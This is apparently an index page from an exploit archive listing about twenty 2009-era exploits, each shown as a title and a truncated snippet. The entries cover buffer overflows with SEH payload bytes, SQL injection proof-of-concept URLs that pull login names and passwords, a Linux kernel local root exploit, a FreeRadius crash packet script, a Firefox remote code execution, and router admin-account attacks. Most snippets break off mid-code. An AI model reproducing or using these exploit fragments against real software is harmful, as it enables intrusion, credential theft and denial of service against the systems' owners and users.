BulletProof FTP Client Buffer Overflow

/ BulletProof FTP Client suffer a buffer overflow SEH. Tested on BullerProof FTP Client v. 2.63 build 56 The last one but may work with older releases as well Registers: EAX 00000000 ECX 65646362 EDX 7C9032BC ntdll.7C9032BC EBX 00000000 ESP 0012F1E0 EBP 0012F200 ESI 00000000 EDI 00000000 EIP...

Endonesia CMS 8.4 local file inclusion

Exploit for unknown platform in category web applications ====================================== Endonesia CMS 8.4 local file inclusion ====================================== Endonesia 8.4 CMS Site: http://www.endonesia.org/ Download: http://sourceforge.net/projects/endonesia Bug: Local File...

Google Apps googleapps.url.mailto:// URI Handler Command Execution

google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit Internet Explorer by nine:situations:group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://pack.google.com/intl/it/packinstaller.html tested against: Internet Explorer 8, windo...

HBcms宏博内容管理系统SQL injection and XSS

updatearticlehits.php中的articleid参数没有严格过滤导致可利用双字节编码漏洞注入 =1.7版本 官方已经修复 请下载1.8版本 poc: 查询账号： http://127.0.0.1/cms/hbcms/php/updatearticlehits.php?showhits=yes&articleid=-1%e5" union select loginname from hbcmsusers where id=1%23 查询密码:...

iBoutique.MALL 1.2 - cat Blind SQL Injection

iBoutique.MALL 1.2 - cat Blind SQL Injection || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ Kings of injection | | // | | |...

Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule

No description provided by source. Fix announce: http://www.mozilla.org/security/announce/2009/mfsa2009-48.html Bug history: https://bugzilla.mozilla.org/showbug.cgi?id=326628 So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11: long addmodulein DOMString moduleName, ...

FreeRadius Packet Of Death

!/usr/bin/env python FreeRadius Packet Of Death Matthew Gillespie 2009-09-11 Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ import sys from scapy.all import IP,UDP,send,Radius,RadiusAttr if...

Joomla! Component BF Survey Pro Free - SQL Injection

Joomla Component BF Survey Pro Free SQL Injection Exploit'; echo 'jdc 2009'; echo 'Google dork: inurl:combfsurveyprofree'; iniset "memorylimit", "128M" ; iniset "maxexecutiontime", 0 ; settimelimit 0 ; if !isset $GET'url' die 'Usage: '.$SERVER'SCRIPTNAME'.'?url=www.victim.com' ; $vulnerableFile =...

CoolPlayer 2.15 Crash

!/usr/bin/perl Founded By :d3b4g CoolPlayer2.15 .M3U Local Buffer Overflow PoC download: http://www.soft32.com/Download/Free/CoolPlayer215/4-570-1.html EAX 00000001 ECX 4ED83DEA EDX 00000000 EBX 001226D0 ASCII"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ESP 00122428...

HTML Creator And Sender 2.3 Buffer Overflow

!/usr/bin/env python HTML Creator & Sender = v2.3 Build 697 Local Buffer Overflow Exploit SEH Coded By: DrIDE Based On: http://www.milw0rm.com/exploits/9446 Testd On: Windows XP SP2 Download: http://www.html-email.net/ Usage: Browse to file, enter anything for From and To, Send Email. import stru...

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

No description provided by source. / 0x82-CVE-2009-2692 Linux kernel 2.4/2.6 32bit socksendpage local ring0 root exploit simple ver Tested RedHat Linux 9.0, Fedora core 411, Whitebox 4, CentOS 4.x. -- Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. spender and venglin's...

ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " \n"; print " ITechBids v8.0 Blind SQL Injection Exploit \n"; print " \n"; print " itechd.php productid...

Ed Charkow's Supercharged Linking SQL Injection

!/usr/bin/perl ========================================================================================== o Ed Charkow's Supercharged Linking Blind SQL Injection Exploit Software : Ed Charkow's Supercharged Linking Buy Script : http://www.infodepot3000.com/Scripts/content/superchargedlinking.html...

ZTE ZXDSL 831 II Modem - Arbitrary Add Admin

ZTE ZXDSL 831 II Modem - Arbitrary Add Admin ----------------------------------------------------- -- Found By SuNHouSe2 ALGERIAN HaCkEr Made in "Maghnia City" DZ Contact : [email protected] Greetz to : His0k4 all my friends Good Ramadan to all muslims http://www.geeksecurity.org/tsttte.JPG...

HTML Email Creator & Sender 2.3 Local Buffer Overflow PoC (SEH)

Exploit for unknown platform in category dos / poc =============================================================== HTML Email Creator & Sender 2.3 Local Buffer Overflow PoC SEH =============================================================== /0day HTML Email Creator & Sender v2.3 Local Buffer...

ZTE ZXDSL 831 II Modem - Arbitrary Add Admin

----------------------------------------------------- -- Found By SuNHouSe2 ALGERIAN HaCkEr Made in "Maghnia City" DZ Contact : [email protected] Greetz to : His0k4 all my friends Good Ramadan to all muslims http://www.geeksecurity.org/tsttte.JPG Firmware Version : ZXDSL 831IIV7.5.0aE09OV...

2WIRE Routers - 'CD35_SETUP_01' Access Validation

source: https://www.securityfocus.com/bid/36031/info Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. Unauthenticated attackers can leverage this issue to change the router's administrative...

Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit

No description provided by source. !/bin/bash Gazelle CMS 1.0 Multiple Vulnerabilities Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download Found by whitesheep on 11/08/2009 Contact: [email protected] - https://www.ihteam.net Need magicquotegpc Off for RCE and LFI...

Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow (SEH)

!/usr/bin/perl by hack4love [email protected] MediaCoder 0.7.1.4490 .lst & .m3u Universal Buffer overflow SEH download :::http://www.mediacoderhq.com Thanks for WwW.Sec-ArT.CoM/cc team and 3asfh.net team my $bof="\x41" x 764; my $nsh="\xEB\x06\x90\x90"; my $seh="\x26\x59\x01\x66";C:\Program...

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (py)

No description provided by source. !/usr/bin/env python Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit Coded By: DrIDE Discovered by: Nine:Situations:Group Tested On: Windows XP SP2, Requires NOS Package Installed Usage: python DrIDE-Adobe912.py import os, subprocess Should probably have...